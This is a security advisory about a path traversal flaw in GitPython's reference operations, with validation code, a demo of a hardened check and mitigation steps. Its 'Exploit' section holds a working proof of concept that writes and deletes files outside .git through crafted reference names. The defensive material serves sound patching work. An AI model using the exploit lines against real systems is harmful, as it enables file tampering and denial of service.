GitPython, Path Traversal, CVE-N/A (Critical)


The vulnerability, tracked as VU128348, allows an attacker to write, overwrite, move, or delete files outside the repository's `.git` directory. The root cause is insufficient validation of reference paths during reference creation, rename, and delete operations. The helper `SymbolicReference._check_ref_name_valid()` does reject traversal sequences such as `..`, but `SymbolicReference.create`, `Reference.create`, `SymbolicReference.set_reference`, `SymbolicReference.rename`, and `SymbolicReference.delete` build filesystem paths from attacker-controlled reference names without enforcing the repository boundary. A local user who can influence the reference name can therefore supply a crafted path (for example `../../../outside.txt`) and write to or delete files outside the intended directory. Exploitation requires the ability to influence reference names that the consuming application passes to GitPython. Successful exploitation can corrupt, delete, or overwrite files, including critical system files reachable by the application's user, resulting in denial of service or integrity compromise. Remediation is to update to a patched GitPython release that validates the resolved path before performing filesystem operations. Affected: GitPython versions <= 3.1.46 and the main branch as of the report.

Platform: Python library
Version: <= 3.1.46
Vulnerability: Path Traversal
Severity: Critical
Date: 2026-05-06
Prediction: 2026-05-06

What Undercode Say:

Check the installed GitPython version:

    pip show gitpython | grep Version

Validate a reference path before any write, rename, or delete. The check resolves the name against the repository's git directory and rejects anything that lands outside it (the original snippet tested `base not in [target, target.parents]`, which compares `base` against the parents sequence object rather than its members and therefore never rejects a traversal; the corrected test is below):

    from pathlib import Path
    from git.refs.reference import Reference

    def _validate_ref_write_path(repo, path, for_git_dir=False):
        # Anchor on .git (for_git_dir) or on the common dir, which differs in worktree checkouts
        base = Path(repo.git_dir if for_git_dir else repo.common_dir).resolve()
        target = (base / path).resolve()
        # The resolved target must be the base itself or lie strictly below it
        if target != base and base not in target.parents:
            raise ValueError(f"Reference path escapes: {path}")
        return str(target)

Example of safe reference creation:

    def secure_ref_create(repo, ref_path, target):
        # Reject traversal first; Reference.create still receives the reference name,
        # not the resolved filesystem path returned by the validator
        _validate_ref_write_path(repo, ref_path)
        Reference.create(repo, ref_path, target)
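The boundary check can be exercised without GitPython installed. What follows is an added example, not code from this page or from the GitPython project: it reconstructs the unsafe join the advisory describes (the reference name appended to the git directory with no boundary check) on a constructed stand-in for a `.git` directory, and sets a hardened `safe_ref_file()` beside it. `ref_name_has_traversal()` is a hypothetical stand-in for the role of `_check_ref_name_valid()`, not that function's code. The advisory's `../../../pwned.txt` case is extended with a `refs/../..` variant, an absolute name, and a symlink inside `.git`, to show why a name-level check alone is not enough and why the resolved path must be compared against the repository root.

```python
import os
import tempfile
from pathlib import Path


def make_fake_git_dir(root: str) -> Path:
    # Constructed stand-in for a repository's .git layout; no GitPython needed.
    git_dir = Path(root) / "repo" / ".git"
    (git_dir / "refs" / "heads").mkdir(parents=True)
    (git_dir / "HEAD").write_text("ref: refs/heads/main\n")
    return git_dir


def vulnerable_ref_file(git_dir: Path, ref_name: str) -> Path:
    # Mirrors the unsafe pattern the advisory describes: the ref name is joined to
    # the git directory with no boundary check. Note that os.path.join also discards
    # the base entirely when ref_name is absolute.
    return Path(os.path.join(str(git_dir), ref_name))


def ref_name_has_traversal(ref_name: str) -> bool:
    # Name-level check (hypothetical, modelled on the role of _check_ref_name_valid()):
    # reject any ".." path component. "a..b" is a legal ref component and passes.
    parts = ref_name.replace("\\", "/").split("/")
    return ".." in parts


def safe_ref_file(git_dir: Path, ref_name: str) -> Path:
    """Return the on-disk path for ref_name, or raise ValueError if it would land
    outside git_dir. Name check and resolved-path check are both applied, because
    each alone misses a case (absolute names, symlinked directories)."""
    if ref_name.startswith(("/", "\\")) or Path(ref_name).is_absolute():
        raise ValueError(f"absolute reference name rejected: {ref_name!r}")
    if ref_name_has_traversal(ref_name):
        raise ValueError(f"traversal in reference name: {ref_name!r}")
    base = git_dir.resolve()
    target = (base / ref_name).resolve()  # follows symlinks, so a symlinked dir is caught
    if target != base and base not in target.parents:
        raise ValueError(f"reference path escapes repository: {ref_name!r}")
    return target


def escapes(git_dir: Path, ref_name: str) -> bool:
    """True if the vulnerable join would place the ref file outside git_dir."""
    base = git_dir.resolve()
    target = vulnerable_ref_file(git_dir, ref_name).resolve()
    return target != base and base not in target.parents


def demo() -> dict:
    """Run the constructed cases.
    Returns {ref_name: (vulnerable_join_escapes, safe_check_accepts)}."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        git_dir = make_fake_git_dir(tmp)
        cases = [
            "refs/heads/feature",      # legitimate ref, stays inside .git
            "../../../pwned.txt",      # the advisory's traversal example
            "refs/../../escape.txt",   # traversal hidden behind the refs/ prefix
            "/etc/passwd",             # absolute name: os.path.join drops the base
        ]
        try:
            # A symlink inside .git/refs pointing above the repo: no ".." in the name,
            # yet the file would land outside. Skipped where symlinks are unavailable.
            (git_dir / "refs" / "out").symlink_to(Path(tmp), target_is_directory=True)
            cases.append("refs/out/leak.txt")
        except OSError:
            pass
        for name in cases:
            try:
                safe_ref_file(git_dir, name)
                accepted = True
            except ValueError:
                accepted = False
            results[name] = (escapes(git_dir, name), accepted)
    return results


if __name__ == "__main__":
    for name, (vuln_escapes, accepted) in demo().items():
        print(f"{name!r:28} vulnerable join escapes={vuln_escapes!s:5} hardened accepts={accepted}")
```

Only `refs/heads/feature` is accepted by the hardened check; every other case escapes under the naive join and is rejected. The symlink case is the one a pure name check cannot see, which is why the resolved path, not the string, must be compared against the repository root.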

Exploit:

    from git import Repo
    from git.refs.reference import Reference
    from git.refs.symbolic import SymbolicReference

    repo = Repo.init("/tmp/vuln_repo")

    # Write outside .git: the reference name is joined to the git directory as-is,
    # so the ref file is created at the traversal path rather than under refs/
    Reference.create(repo, "../../../pwned.txt", "HEAD")

    # Delete outside .git: the file at the traversal path is removed if it exists
    SymbolicReference.delete(repo, "../../../target.txt")

Protection from this CVE:

  • Upgrade to GitPython >= 3.1.47
  • Apply strict reference path validation before every create, rename, set_reference, or delete
  • Use `_validate_ref_write_path()` as an allow-list check: the resolved path must stay inside the repository's git directory
  • Run the application under a user with restrictive filesystem permissions so a traversal cannot reach sensitive files
  • Avoid exposing reference APIs to untrusted user input

Impact:

  • Write/Overwrite: Attacker can write arbitrary files, corrupting configs or planting backdoors
  • Delete: Attacker can delete critical files, causing denial of service
  • Move/Rename: Attacker can relocate sensitive files, leading to information disclosure or privilege escalation
  • Integrity: High – system files and application state can be compromised
  • Availability: High – deletion of essential files can disrupt services
  • Affected: Applications using GitPython reference operations with user-controlled input, such as Git automation services, CI/CD helpers, and multi-user repository management platforms

Sources:

Reported By: github.com